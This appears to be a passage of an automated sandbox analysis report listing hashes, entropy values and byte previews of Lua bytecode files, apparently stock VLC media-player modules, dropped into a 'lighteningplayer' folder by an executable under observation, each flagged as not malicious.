                                                                                                                                                                                      SHA-256:09BD722B8C4CD442D56C7C730C2A363CF9BDFCB6A8971F00BE002C90C40215B9
                                                                                                                                                                                      SHA-512:8CEC6D4B727D9C1CD86841F4407CC2777ADE072BB6BC1F7229AED0F730068225C58DB6A063DE1B15418C2C9341369480043398F2F60BB9038423923199E5F760
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ## <pre>..##..## <a href="vlm.html">VLM HTTP interface</a>..## This file can be loaded as is in VLM...## Comments starting with "##" were added by the HTTP interface...## You can remove them if you want to...##..<?vlc print(vlc.vlm.execute_command(vlm,"export").value) ?>....##..## end of export..## </pre>..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44633
                                                                                                                                                                                      Entropy (8bit):4.89913513959695
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:trh+Rda03tq0/NN5NxhE5+ghBNZwlwEyh3AlbSlJ9wwwwwwwwwwwwvz+:+Z9xdBE9bwwtmmlwwwwwwwwwwwwb+
                                                                                                                                                                                      MD5:3242B351C54A21FE1A4241E6EE3B03C1
                                                                                                                                                                                      SHA1:9DE232F6FF01146E13C07C754AA26F0F558B034A
                                                                                                                                                                                      SHA-256:DFEF93369D316B693E564A7D54646CF21925D1BE7A45591746138F9A71FF8614
                                                                                                                                                                                      SHA-512:C2082899AC0933BA37CBA90D7D67DBA582917C78AF173E1B8F1C3DE345E5853B24CADFE8C49219886D2D91BC907FAB9548F92F60BFFFC4CF02B458538A41D850
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......<...@../../extras/package/win32/../../../share/lua/intf/cli.lua............9.....@..........A....@........A.....$....@........A...........A......@....B...B......@....B...B...................C..@D...D...D.E.......\....@......@...@..E@..........E...F...Z.......E....A......\..........................EA..........I...EA..F...FA..............E....B......\....A..\A......EA..F...FA..............E....B......\...........\A..!....@..$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@......J....................@S..S.b@..............E....A...AS...T..@..........J.......I...IAT..@......A.................T...U."A..J....A.......B..EB..F...FB...........U...U.bA.......A......EB...B....V..BV..A..........J.......I...I.V.I.W..A......AB.......B.......W.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):819
                                                                                                                                                                                      Entropy (8bit):4.9723691235127445
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:X8bHK/ojVI9QclwEZKqyprrT2tFOj43iXp4KniimlRpMwu66666m6sA4:M26I20p05rrKOj43iXpH1eu66666m6Q
                                                                                                                                                                                      MD5:65189CE9885CF5649928240BDA8CD01D
                                                                                                                                                                                      SHA1:B1AFB9C7F6A99219B2A6773A06D603DEDE507755
                                                                                                                                                                                      SHA-256:38BAEE11F33139962A5269E1BB71B39A6F3EEC851F98F926396F6CD5B8BC1A4A
                                                                                                                                                                                      SHA-512:D3BCDFBD3C502983108C1A676AEBFD70E3AF99B08F7E2F0ED82C92BF5487AA2C7EA96E1FB318F3045F31F1A6722FC6F4365B25EF67C39FA0477D615A639619A2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......>...@../../extras/package/win32/../../../share/lua/intf/dummy.lua..................@............@.E................A....@...A.@....A..!@.......@....A...B..@...............msg..g...This is the `dummy' VLC Lua interface module..Please specify a VLC Lua interface to load with the --lua-intf option..VLC Lua interface modules include: `cli' and `http'..For example: vlc -I luaintf --lua-intf cli.You can also use the alternate syntax: vlc -I "luaintf{intf=cli}".See share/lua/intf/README.txt for more information about lua interface modules.......string......gmatch......([^.]+).*......vlc......err......misc......quit.................................................................................................(for generator).............(for state).............(for control).............line.............
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1755
                                                                                                                                                                                      Entropy (8bit):4.2511052233920354
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:MZilZzZsHuZOJuZAHz0YiQgScALRmdwu5eCJ+RhAiqNAEA9te0888omaVnKIu:LVsO72iQBRm7A+KYA9tT888omf/
                                                                                                                                                                                      MD5:070319585977FB0F42A60DD67351B13F
                                                                                                                                                                                      SHA1:3E55EBFFDD2A02EA6298AC4DB8E1AA4E6FC08CD7
                                                                                                                                                                                      SHA-256:28D95FC84DE6808EDDFACE65916D4B0814DCE85BB6ABFAC36D7D0D66F768F2E8
                                                                                                                                                                                      SHA-512:527D519D00FE13A2323BA10F7468BED4B4A36560C8F8998F81E7B19ADA6C74576E4757178AF0EC3468B5386E00C3AAC126CAE87E917185A8A667179B8A454B5D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......A...@../../extras/package/win32/../../../share/lua/intf/dumpmeta.lua.............s...E...F@..F...\...............K.@.\...Z.......K.A.\...F@...@......E...F...F....@...B........\@..E...F...F................@....C............\@..E...F...F............AD............\@..E...F...F.......\@..K.D.\...Z....................................B..@................A....................A...B......@........A...B......@........B..........@...............B..@....B...A........................A...B.AC..............U....C.......................F...F..@...............vlc......input......item......is_preparsed......stats......demux_read_bytes...............msg......info......name: ......name......uri: ......strings......decode_uri......uri......duration: ......tostring......duration......meta data:......metas......pairs...... ......: ...... no meta data available......info:...... ......misc......quit.....s... ... ... ... ... ...!...!...!...!...!...!...%...%...%...%...%...'...'...'...'...'.
C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):13229
Entropy (8bit):4.540614469056307
Encrypted:false
SSDEEP:192:3rpBEdZ/ON2KK6XLtyIFdCWAeOXkoQYT:3EJF6RyiOX
MD5:03E16639D4696D4ABB44D7B756EF271A
SHA1:A5627446F6135A53D312BCB9793A12C1FBD434D6
SHA-256:EEBC60A3C2CDBD0BE0DD0633E93507A12B84FD74D0F0A79077B2059CCEFFF9F9
SHA-512:2F7DC4965DCBF6F05481B4D7DCEFB5DAEBDDF7A4BE57C6C06D8A3D9A7F447494E67F808905017076E776718355B91867BF8736C987E55C3AE21435DD0D77E4BB
Malicious:false
Preview: .LuaQ.......=...@../../extras/package/win32/../../../share/lua/intf/http.lua.....................A@...@........@...A.A@...@...........@..................C..@D...D..@E...E..@F..@F........$....@..$@......$.......$.......$....@..$@......$.......$.......$....@..$@......$...E...F@..Z@......@.......\...G...E...F............A...........................@...@........@...L.AA..........U........A............@...L.A...........U....A.......A..J...G@..d.............M...............@...M...........M.AA...@...@........N............................A.......@..A...........U...ZA......A....A.......@........P...Q......A................Q..................@.......@R.....C...........................K........require......common......vlc......msg......info......Lua HTTP interface......open_tag......<?vlc......close_tag......?>......mimes......txt......text/plain......json......html......text/html......xml......text/xml......js......text/javascript......css......text/css......png......image/png......jpg....
C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):2081
Entropy (8bit):4.545688815781294
Encrypted:false
SSDEEP:24:MKm+W4bucma+Y/DUMhVFN1G9/2UwMLDW/U3/2gN5TWJKzbnWBPOF37:vd9+SN0OUXXWcXT1nYir
MD5:C2BF59C1030AC644E3B5B221B809256C
SHA1:19D7DF03ED0D2B7983005B39842044EAD8F3073F
SHA-256:EA4E1F2C3CAD6B7889E751F860BE9946ED112D7C6FC477AF7E3DEDDD541932BA
SHA-512:71FFC297A7CD5A280907B16BD3C87EAA4DAA97D011767DBD48FD560CDC2B97CA6817816028DE8BC33CB5890274047F6499A6317FAAFF9210D064253720F8A1DE
Malicious:false
Preview: .LuaQ.......=...@../../extras/package/win32/../../../share/lua/intf/luac.lua............. ....@..........A....@......A....@..$....@...@.......@............A.E....................AB...B.@....A..!@............B...C..@...............usage......To compile a lua script to bytecode (luac) run:. vlc -I luaintf --lua-intf --lua-config 'luac={input="file.lua",output="file.luac"}'.Output will be similar to that of the luac command line tool provided with lua with the following arguments:. luac -o file.luac file.lua.......require......string......io......compile......gmatch......([^.]+).*......vlc......msg......err......misc......quit.........#...:.......Z........@@...@.A....@.......@@...@.A....@.................U....@.......@@...@.A@...@................U....@........A...............B..@...........@@...B.A....@...........@..E...F........@...........@@...B...........A.A...........@...............@D................@...........A@...B.A.........B.........U....A...............AE.......E.......
C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):12639
Entropy (8bit):4.3808726164835115
Encrypted:false
SSDEEP:192:MMMiTMpF2BfxytRAfHaUI0TBD2gHZeC+pm4le:/DTw2BfxydkT4Y
MD5:C8FCA481585D2A65287871B0D8DE4EDC
SHA1:DE49833F5DA2524EC12D20C4E3C80571E492FB31
SHA-256:D9130E5C70B64E14B2FBDA19A1F726D81427246942663B4DC3FBAD33F9DE6233
SHA-512:810EF10F1724BB7C5B0D6A4CF418E2CF98FA8458555FE9A943FEDA3CF2A387D8C5C6D7EF0F84932524C99F618321DFE149581C30D938C726E7C5AB70DB38EEB2
Malicious:false
Preview: .LuaQ.......E...@../../extras/package/win32/../../../share/lua/intf/modules/host.lua.....................A@........@..@.............................B......C.....@..$.......$@...@...............module......host......package......seeall......status......init...............read.........?.....write.........@.....password.........@.....client_type......net......stdio......fifo......telnet.........@.....is_flag_set.........F...O....................@......P.....@..........@..........................................@........?........@........G...H...H...I...J...K...L...L...L...L...L...L...L...N...N...O...........val.............flag.............bit.................Q...p.......B.......J...........$A..d...........$B..d...................$C..d...................................................................$D..d............................................E..B.......E.......\...I...........J...I...I...I...I...IE..I...................................setfenv......newproxy......getmetatable..
C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):18542
Entropy (8bit):4.662692977433414
Encrypted:false
SSDEEP:384:e6LulKXpBz+F4upzyyyyyNsssssoEp2BBifCYvuuuuuuuTT17whNR8LNZlBku:fulKXpBEiKeQDvuuuuuuuTTaNR8xZ5
MD5:F37B5246A994C2CCBDD4C81565699905
SHA1:574CCC51162C86A642BFF919E4ACCBF59D391EB8
SHA-256:BAA8410F89BC3491267E61F310EFAAEEA1BD1ECCC84324B3FDE1DF5742C87C08
SHA-512:1E6BE290DDEAAD7310ABD7F9E7B832246F78ABA49111146E0853DFD48E5BD4C97C9369BD7F3EFC21A57858EBC3F582A1CDB3F46A784D84FDE34B9EE60EF25A1F
Malicious:false
Preview: .LuaQ.......M...@../../extras/package/win32/../../../share/lua/intf/modules/httprequests.lua.............+.......A@........@..@......A@......E.......\................@...............@.......................@.......................@..........@......................@......................module......httprequests......package......seeall......require......common......dkjson......round......strsplit......processcommands......xmlString......removeArrayIndicators......printTableAsJson......printTableAsXml......getplaylist......parseplaylist......playlisttable......getbrowsetable......getstatus.........!...).......#................@@...........@...........................@..........@A............@.............................@...................................type......string......us_tonumber......number......math......floor......pow........$@........?....#..."..."..."..."..."...#...#...#...#...#...%...%...%...%...%...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&..
C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):1002
Entropy (8bit):4.370898931671847
Encrypted:false
SSDEEP:12:X8CHK006SC7lSuGYm9B87QWyMr3/TH7q7RWdiIZvXq4/JlUPPNDIIII1l/C9ryMq:MX0XlmY68yMr3/rXd7/1/oHNDn42yGl
MD5:722FA7EAA4086A34116DD6AE05588648
SHA1:8B8B813F4CE8CF229A30BABAE02DDD81C0201A89
SHA-256:474D67CD6C624E85FB408850147D1A8ABD669C78952854DEE89CB64D3371D4AE
SHA-512:EBB1B7C8BA572B703252DAFD55B2A97E4C80C22CE93C6250969DFA9CB6765C8A714BB33C1D4F8839EAF7F96649B41DFBF01F34D2F898CDF9CD0A1ABEAF17BB37
Malicious:false
Preview: .LuaQ.......?...@../../extras/package/win32/../../../share/lua/intf/telnet.lua.............@........@@...@...........@...@......................@@...@..@......J.........@.b@...@...@..E...F@..........W.A..@..E...F........A..\...W....@..W...............................................AB..................A.....!....@........C.............E@...@...............config......hosts.......host......telnet://localhost:4212......pairs......*console......string......match......^%s*(.-)://......telnet......telnet://......gsub......^%s*.-://......vlm......vlc......dofile......wrapped_file.....@........................................................................................................... ... ...!...!...!...!...!..."..."..."..."...#...$...$...%...%...%...%...'...'...'...'...'...'...'...*...*...*.......,...1...1...1...1...3...3...3...3...........(for generator).....8.......(for state).....8.......(for control).....8.......i.....6.......host.....6.......proto.!...6.......newhost.&...6.....
C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):2950
Entropy (8bit):4.475212928576038
Encrypted:false
SSDEEP:48:1JmitbKWtmAdY8wRaictRvZ6CCr8881yJo7zGmxRS8VXPoYoYTAYmSSSSSSSI/Jd:6SbKWIq72EJG+zJRrVXEBSSSSSSSIxd
MD5:209C02A2729D3EA9F3E933F33DB91939
SHA1:6CF6E6C702572AF00A86D95A18483816D6E71FA1
SHA-256:805E556ACD26208EECCFD67208A07462C497184DC3BB4CDE721CD2DA2E31328B
SHA-512:F5BC7564094796057BC9B5E31222D4F46568012AC2182775B4297BB022CA4117A5CE2688512E2ABA9DE51508A357D5A28A1D7B6BD8D6674D6EA400CDABCAF919
Malicious:false
Preview: .LuaQ.......K...@../../extras/package/win32/../../../share/lua/meta/art/00_musicbrainz.lua.................$.......$@...@..$.......$....................descriptor......try_query......get_releaseid......fetch_art..........................@...@@..................scope......network........................................./.......?...A.......U....@....@..........@...@............@.A............B.@....A......G....A...A................B.@...........G.......................@....A................B.@...............G.......................E....A...........A....D...D.A....A...................%...http://mb.videolan.org/ws/2/release/......vlc......stream......read......P..@.....found......_......string......find......<artwork>true</artwork>......front......<front>true</front>..$...http://coverartarchive.org/release/....../front-500......asin......<asin>(%w+)</asin>..#...http://images.amazon.com/images/P/.......01._SCLZZZZZZZ_.jpg......msg......dbg..G...Neither coverartarchive.org nor amazon have c
C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):1442
Entropy (8bit):4.269687836162008
Encrypted:false
SSDEEP:24:MbgVL0gintomAIl8tV+mtPrt+qR4mlkWEYZXIKw3Tq/SCCCCN8888pmXM:+gitomAIl8tV+mtPrt0mpDSKwTCSCCC0
MD5:5B87647E5B549EFB6771D4E8E334309C
SHA1:0D3B986BBAEC68923C2AC40C034B46FAD3BB92E6
SHA-256:75BCDC91C702EA7590CA196CEA0C790574395DB9892CDC9C68082D5B1DCD2DA5
SHA-512:2F38C8335C217DD14F4BF40471F507522817E53CF1746BDA5B32FEFE38C105B93FE3918D2FE9C3D768E0048A76E9B546143AA9EA64F66C0B8C0E9639B6100AED
Malicious:false
Preview: .LuaQ.......K...@../../extras/package/win32/../../../share/lua/meta/art/01_googleimage.lua.................$.......$@...@...............descriptor......fetch_art..........................@...@@..................scope......network.........................................7.......Y........@@...@..@...............@@...@.....F.A..@......F.A.....U...G.......F.A.........F.A..@..U...G.......F.B.Z....@..F.B.Z.......F.B.......B..A..U...G.......F.B.Z....@..F.A.Z.......F.B......A..A..U...G....@..C...^...E...F............@................\...G...E...Z@...@..C...^...E...K....@..\...G...C...G...E...F@..........\@.............G...E...^................vlc......item.......metas......Listing Type......radio......title...... radio logo......tv...... tv logo......artist......album...... ...... cover......fd......stream..#...http://images.google.com/images?q=......strings......encode_uri_component......page......read......P..@....._......arturl......string......find..5...<img height="([0-9]+)" src="([^"
C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):4377
Entropy (8bit):5.492049941935413
Encrypted:false
SSDEEP:48:2gitzfhQE/Pc9nOnfibkGPSPPTtvaMxq7eLURZ892rFVpUVy/:vSzC2PanOnfiTPShvaMxq7oUnFVp8
MD5:F2C24124C2FD7E0E9F633D6C80502A00
SHA1:50D8A9E6266909D60A9CB64420C2F03812812FAB
SHA-256:314EF84B29B7EBD7F5E5A2A64A31BB4CA22ABA490EB846D9044410E113888B6C
SHA-512:3E25950A2284C17D1AC663682B462D85BE5E1F373821D4ABEDE1561A45B1BA3F88A51CE1579E52E070B6A542519C2E576C8B4B9A68500982B4A870059CE37F20
Malicious:false
Preview: .LuaQ.......H...@../../extras/package/win32/../../../share/lua/meta/art/02_frenchtv.lua.................$.......$@...@...............descriptor......fetch_art..........................@...@@..................scope......network.........................................K.......?........@@...@..@A...A..@B...B..@C...C..@D...D..@E...E..@F...F..@G...G..@H...H..@I...I..@J...J..@K...K..@L...L..@M.E...F...K...\........@.......@...@......................AA.........................A..........................A.........................A........TF1..]...https://upload.wikimedia.org/wikipedia/fr/thumb/7/77/TF1_(2013).svg/610px-TF1_(2013).svg.png......France 2..}...https://upload.wikimedia.org/wikipedia/fr/thumb/e/e8/France_2_logo_antenne_(2008).png/270px-France_2_logo_antenne_(2008).png......France 3..m...https://upload.wikimedia.org/wikipedia/fr/thumb/3/33/France_3_logo_2016.svg/275px-France_3_logo_2016.svg.png......Canal+..e...https://upload.wikimedia.org/wikipedia/commons/thumb/1/1a/Canal%2B.sv
C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):1640
Entropy (8bit):4.199652508597613
Encrypted:false
SSDEEP:48:fN8git6mXEffnemtPJTgeuRRUCCCCCM88888g:LS6m+pceKa
MD5:ECCDE037E0F76C68F3C51513B396E28E
SHA1:FA6EDFB2E7E8A8C65EF72CDA4AD67DE3C2FFE0A0
SHA-256:7ABD95BE704AE8110EED5221C3985E5C62DF87C551389723C374A70859C3183E
SHA-512:CC09B86CE3026CE6A423B501244D0730B6532FC7C1CCF0DA6D4EB3055AF818D17E64D7CF73AC504E644D55052565C1CB010411271312919CA439C32690722577
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......F...@../../extras/package/win32/../../../share/lua/meta/art/03_lastfm.lua.................$.......$@...@...............descriptor......fetch_art..........................@...@@..................scope......network.........................................:.......n........@@...@..@...............@@...@.....F.A.W@......F.A......@..C...^...F.A.Z.......F.B.Z....@..E...F...F.....A.\....................B....U...G@...@..C...^...E@..F....@..........\...G@..E@..F....@...@......\...G@..E@..F....@..........\...G@..E@..F....@..........\...G@..E...F@.......@......\...G...E...Z@...@..C...^...E...K....@..\...G...C...G...E@..F........@..\...........G...E...Z.......E@..F...........\...Z....@..C...^...E...^................vlc......item.......metas......Listing Type......radio......tv......artist......album......title......strings......encode_uri_component....../......string......gsub...... ?%-.*............%(.*%)......CD%d+......Disc %w+......fd......stream......http://www.last.fm/music/....
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1350
                                                                                                                                                                                      Entropy (8bit):4.008717579188147
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:MoKnqhiQuVGfuT4QUYKAedwOajpm4Ym/Mzo1v4:hhiQuWbQHKNm/oK
                                                                                                                                                                                      MD5:4940745BA8D5327E1C9306D96FBAF4D9
                                                                                                                                                                                      SHA1:51AED602D2C916F6F311F66BC21F4FE11F1713C3
                                                                                                                                                                                      SHA-256:1C4253BB00CBD7877AEBD40AF91C38A22F70F56AD83941AADDCBA6E8C80683B4
                                                                                                                                                                                      SHA-512:C1864FE3C7491604227512CBC7A115EE36655D378413F72D7C5C6CBDD45386E61BB7B49B2925D62DC81D30133D6BA05141E1CD3333361FB2217F6AA8C4B21268
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......H...@../../extras/package/win32/../../../share/lua/meta/reader/filename.lua.................$.......$@...@..$....................descriptor......trim......read_meta..........................@...@@..................scope......local.....................................................E...F@..............\...^................string......gsub......^%s*(.-)%s*$......%1.................................................s.....................8.......B........@@...@.....F.@.Z...........F.A.Z@...................AB.@.......................GA...A.......A..............E...F........A......\................A@...C............@....B...........A.......A@...C.........A.......A@...C..........A.......A@...C..........A...............vlc......item......metas......title......filename......_......showName......episodeNumber......string......find......(.+)S(%d+)E(%d+).*......trim......gsub......%....... ......set_meta...... S......E......seasonNumber.....B..................."..."..."...#...&...'...
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7524
                                                                                                                                                                                      Entropy (8bit):3.9390747019832797
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:P/vORGXj3RWlExyUn4ZF2k5wixMMMMMMlye0iY+fcKdCXSQsCu+c8Ph+cU:3aGDy5IkBJY+fbSk+th+V
                                                                                                                                                                                      MD5:975FE0B3ABCD7768BF35BA2E1D3879FC
                                                                                                                                                                                      SHA1:618C6395E25D3B008EC8429FBCFF4382AA84D633
                                                                                                                                                                                      SHA-256:F74176731FF61FFCE6C585112CE97977AF489E4BDB4EE80CADCB014CBBF66ABC
                                                                                                                                                                                      SHA-512:FB318EF9C6BCC9B82079A30617E7F00C645EB979CB89A7ECD8FFF62DFBD355760E4C14779BB208716E5EF0708D16C25A423F0681E170297193E4E7DC7058A920
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......B...@../../extras/package/win32/../../../share/lua/modules/common.lua.............&.......A@........@..@..$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$....................module......common......package......seeall......pairs_sorted......skip......setarg......hotkey......snapshot......table_copy......us_tonumber......us_tostring......strip......table_print......print_callbacks......durationtostring......realpath......parsetime......seek......volume.........................J....................A.........@....A...........@....@......@.......................................pairs......table......insert......sort........................................@.........D....@..D...............F.......................?........................................................................i.....s.....t.........................................................................................................t......
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26008
                                                                                                                                                                                      Entropy (8bit):4.523691683449061
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:8/wxrCpx/qZUr7Yp+pSUGnJBwwwwwwwwwfoSJmefUeOe35MfrIMyRekD6V:EwwpxxskGnXwwwwwwwwwRrceOe36TnV
                                                                                                                                                                                      MD5:F6C2CF57FC5062DAA136E4055794B7B5
                                                                                                                                                                                      SHA1:11D180DFCF0CCE4C48CA3084801EFFFA9F1F6638
                                                                                                                                                                                      SHA-256:019BDEC8648B5537DA417DB99E252FBDC074C30F92ECC08F0D6DD9BF0B99D0EA
                                                                                                                                                                                      SHA-512:FA6CB1F21EBF32CEBA5F63891AD5E3FE6667C87FE835F3B4C142BAB430B5E4A41DC1671FFC7F5E2D93B6CD8509A8CAAB8B31CB40951509DDDC0B32CDBB27DFB1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......B...@../../extras/package/win32/../../../share/lua/modules/dkjson.lua............,........E....@.........E....A.........E....B...............C.EC..F....C....C..C.......D...DD.ED..F....D....D..D.......E...EE.E...F................EF.......F.....$.......E....F..........J...I...I.......\F......JF..IFH......F...........F...........G..d....G......I........................FI...I..FJ...J..FK...K..FL.$...................dG..........................I...........$.......I.......dH..................$...........................................................I............H..........$...........J...I.I.I.I.II.I.J.I..I.K.I..I.L.................................................dJ..............................$...........................................I...........................................I....................J..^.......=........pairs......type......tostring......tonumber......getmetatable......setmetatable......rawset......error......require......pcall......math......floor......
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4028
                                                                                                                                                                                      Entropy (8bit):4.193139219783856
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:dmFQc8G4sXLkEepHwdwAE6gxZclM4nHzT4865SSSSkS:i8fgBawdE6YyVnHv486iS
                                                                                                                                                                                      MD5:4C75C09E508544DA7FE3055CEA96AB83
                                                                                                                                                                                      SHA1:31240C372063F1594E0B668F539E90DAB60EBEE5
                                                                                                                                                                                      SHA-256:1C544A29615B0C714596B2182375D66E5F26B28891A4E6CB244B62A5E5A8B448
                                                                                                                                                                                      SHA-512:034959653A2F9EDA6696223E062C57CDB53EC3CE53F6C44E85C1377C6ABB797BCFC2CBB2D5389BCBA47806EAF95893C3DC41C98EDB86FE2C9CBD5462B5312301
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......C...@../../extras/package/win32/../../../share/lua/modules/sandbox.lua.............O.......A@........@..@.......@A..@A..@...@A..@...@A..@...@A..@...@A..@...@A..@A..@...@A..@A.E............@..d...G...J...................I...............J....A..bA......I...................I...................I...................I........@...A..J...............AB......bA......I........@...A......I....@...........@......#........module......sandbox......package......seeall......collectgarbage........dofile......_G......getfenv......getmetatable......load......loadfile......rawequal......rawget......rawset......setfenv......setmetatable......require......debug......_VERSION......Lua 5.1......loadstring......readonly_table_proxy......coroutine......string......dump......table......math......io......os......exit......getenv......remove......rename......setlocale.........4...K.......(...............@.....................W................@..........J............A..............I.A..................
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3227
                                                                                                                                                                                      Entropy (8bit):4.246256007383686
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:1w466Al5j3F5WSFZZHpavSSgfTTV2vwZYE:1wZ3f5f9fXV9Y
                                                                                                                                                                                      MD5:A047B5AFD40CDD7CEB13D24C172FD2AE
                                                                                                                                                                                      SHA1:4128C3EDB601FB4DA82C3B2A1882FFE17519B832
                                                                                                                                                                                      SHA-256:638F7A7D0F3689DD8845BDBDA3D925FE507972A99109A1800DF5B3D596C543FD
                                                                                                                                                                                      SHA-512:9536CA581FE146825ED50310E1045E350DFD0EC2656D0751F0920EA023963DD1E2C809D46A85FDD73D2AFE2A428FDFB5F17E4D5124C17ACE501D465B8D98EF39
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......E...@../../extras/package/win32/../../../share/lua/modules/simplexml.lua.....................A@........@..@..$...d@......G...d.......G@..d.......G...d...G................module......simplexml......package......seeall......parse_url......parse_stream......parse_string......add_name_maps......... ...W............@.......................@@......@.@..........J................@...@A.............J....B..J....B..KB..\...W.........A.....B..........@............@............B.@....B..............@....B...........@C.....................F.A.W@...@..T...........E.......\B..@.................D......B........D...B..B........C......C..@....B...B...........@..............LD.......C..............I.......EB......\.............C...B......C..a.......T....A..E...F.......\B........D...........C.F.B......B......................................A....B...................vlc......xml......create_reader......next_node..................?.....name......attributes......children......next_attr.......ta
